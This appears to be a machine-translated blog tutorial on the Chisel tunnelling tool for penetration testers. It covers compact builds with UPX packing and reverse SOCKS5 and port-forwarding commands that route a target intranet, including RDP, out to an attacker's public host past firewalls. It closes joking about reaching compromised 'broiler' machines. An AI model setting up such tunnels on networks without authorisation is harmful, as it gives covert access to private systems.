Use Chisel to traverse the intranet
Recently, when I encountered a target in the project on the intranet, I used Chisel to open a tunnel to the intranet. If I want to do something good, I must first sharpen my tools, so I decided to share this tool with everyone.
What is Chisel
Chisel is a fast TCP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang).
Https://github.com/jpillora/chisel
The above is the explanation in chisel official GitHub repo
In one sentence, it is: Chisel is a fast TCP tunneling tool for writing open source communication encryption for bypassing firewalls using HTTP? protocol for transmission.
Features:
- Easy to use
- high performance
- Encrypted connection using SSH protocol (via crypto/ssh)
- Support for authentication
- Client automatically reconnects
- Clients can create multiple tunnels over a single TCP connection
- Clients can create an HTTP CONNECT proxy
- Server can choose to double as a reverse proxy
- The server can choose to create a SOCKS5 proxy
- Support reverse port forwarding
Why choose Chisel
Lcx is a well-known port forwarding tool in China. It is very stable but has a shortcoming. For example, using lcx to forward the RDP port of the intranet Windows, the RDP connection cannot be used after it is disconnected once, and the port must be re-executed. Forward
EarthWorm&Termite is really powerful, the file size is only a few tens of KB, but this tool is closed source, and it doesn’t feel good for free but closed source programs, because the tool has been killed and killed.
The author also stopped developing
Also found a tool called frp, a lot of features, but the operation requires a configuration file, not suitable for penetration of network penetration in the test.
There are many similar tools, you can choose according to your own needs.
Choosing to find Chisel is still quite good.
Install Chisel
Chisel is written in Go, so it supports almost all operating systems. It can download executable files for each operating system directly from GitHub, but it is relatively large. The executable file under the downloaded MacOS system is 8M in size, so I Choose to compile from source, customize the configuration to a smaller size
First, prepare the Go runtime environment. For the installation method of each operating system, see the official website:https://golang.org/doc/install
The following operations are performed under the MacOS system.
Need to be set before downloading GOPATH
Download chisel from github
go get -v github.com/jpillora/chisel
Compile
go build github.com/jpillora/chisel
Will generate an executable called Chisel in the current directory, let’s look at the size
▶ go build github.com/jpillora/chisel
▶ du -sh chisel
11M chisel
11 M, too large, you can reduce the file content by removing the symbol table (-s)and relocating information at compile time (-w).
▶ go build -ldflags "-s -w" github.com/jpillora/chisel
~/MyTools/Pivot
▶ du -sh chisel
8.8M chisel
It’s 8M now, it’s still a bit big, try adding a UPX shell.
▶ upx -9 chisel
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2018
UPX 3.95 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 26th 2018
File size Ratio Format Name
-------------------- ------ ----------- -----------
9258820 -> 3399696 36.72% macho/amd64 chisel
Packed 1 file.
▶ du -sh chisel
4.0M chisel
Now it’s 4M, it’s still a bit bigger than other tools, but it’s good to compress from 11M to 4M. The executable file compiled by go is very large because go compiles by default using static compilation, does not depend on any dynamic links. Library, so you can deploy to any running environment, don’t worry about dependency
Compile the Windows version on MacOS using the following command
▶ env GOOS=windows GOARCH=amd64 go build -o chisel-x64.exe -ldflags "-s -w" github.com/jpillora/chisel
▶ file chisel-x64.exe
chisel-x64.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Compress with UPX
▶ du -sh chisel-x64.exe
8.0M chisel-x64.exe
▶ upx chisel-x64.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2018
UPX 3.95 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 26th 2018
File size Ratio Format Name
-------------------- ------ ----------- -----------
8342528 -> 3173376 38.04% win64/pe chisel-x64.exe
Packed 1 file.
▶ du -sh chisel-x64.exe
3.0M chisel-x64.exe
If desired the compiled executable file in the other operating system, go buildprovided compile time GOOSand GOARCHis a value corresponding to the specific value Seeing GitHub Gist
Use Chisel to bounce Socks5 proxy
Chisel can use the Chisel to bounce a socks5 agent from the target network when it encounters a target in the penetration test or is blocked by the firewall.
The principle of Chisel’s rebound Socks5 agent is roughly as follows
The specific steps are as follows:
Executed in a host with a public IP address
chisel server -p 1111 --reverse
The above command will listen to the local (0.0.0.0) port 1111 and allow the far end to specify the forwarding port.
chisel client 0.0.0.0:2222 socks
The above command will start the socks5 service on the local 1080 port of 127.0.0.1 and forward the request to the local port 2222.
Executed in the host of the target network that needs to be accessed or in the host in the LAN environment
chisel client WANIP:1111 R:2222:127.0.0.1:3333
The above command opens a tunnel on port 1111 of WANIP and maps the 2222 port of WANIP to the local 3333 port in this tunnel.
chisel server -p 3333 --socks5
The above command starts the Socks5 service on the local 3333 port.
At this time, the Socks5 proxy of the public network host 1080 port leads to the other network through the tunnel of the 1111 port.
Conditional students can go to see Ippsec video demo
Port mapping using Chisel
Chisel can implement the same functions as lcx, as follows:
Start the Chisel server on the public network host:
chisel server -p 1337 --reverse
Start the Chisel client on the intranet host:
chisel client WANIP:1337 R:1234:LANIP:3389
WANIP is the public network IP of the public network host, and LANIP is the internal network IP of the internal network host.
If the client mode of Chisel is started on server1 and the LANIP is the IP of server1, the port 3389 of server1 is mapped to port 1234 of the public network host.
If the client mode of Chisel is running on server1, but the LANIP is the IP of server2, the 3389 port of server2 is mapped to the port 1234 of the public network through server1.
From the second usage, Chisel’s port forwarding function is more powerful than lcx.
After mastering the above port forwarding skills, Ma Ma no longer has to worry that I can’t access my fragrant broiler because of the firewall or internal and external network restrictions!